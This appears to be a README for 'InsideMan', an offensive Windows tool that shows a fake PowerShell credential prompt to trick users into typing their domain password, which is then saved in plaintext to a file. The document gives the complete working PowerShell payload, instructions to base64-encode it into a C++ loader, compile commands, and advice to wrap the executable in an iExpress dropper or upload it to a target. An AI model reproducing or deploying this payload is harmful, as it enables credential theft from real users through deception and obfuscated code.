Inspired by the "A Theif" method from the Sektor7 Windows Privilege Escallation Course, InsideMan is an internal Windows phishing executable that utilizes Powershell Get-Credential calls in an attempt to coerce the user into typing thier plaintext password into the prompt. The plaintext password is then written to a file named windows32.txt located in the user's Documents directory.

This is not a sophisticated attack. Might set off an alarm or two with advanced EDR looking for abnormal powershell calls.

USAGE:

Use gcc to compile the cpp file. gcc.exe insideman.cpp -o insideman.exe

Attach to a dropper with iExpress or upload to target.

Plaintext password is stored at C:\Users$user\Documents\windows32.txt on the target machine.

ROLL YOUR OWN:

1). Open Powershell and copy the command below (Change text/output path as needed for specific pretexts):

$str= '$sessionCredential = $host.ui.PromptForCredential("Authentication Required", "Please Enter Your Domain Username and Password:", "$env:UserDomain$env:USERNAME", ""); $mpass = [System.Net.NetworkCredential]::new("",$sessionCredential.password).Password; $user = $env:USERNAME; $mpass > C:\Users\user\Documents\windows32.txt'

2.) Translate To Base64

'[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))'

3.) Paste Base64 Output to Base64 String In InsideMan.cpp

4.) Compile

gcc.exe insideman.cpp -o insideman.exe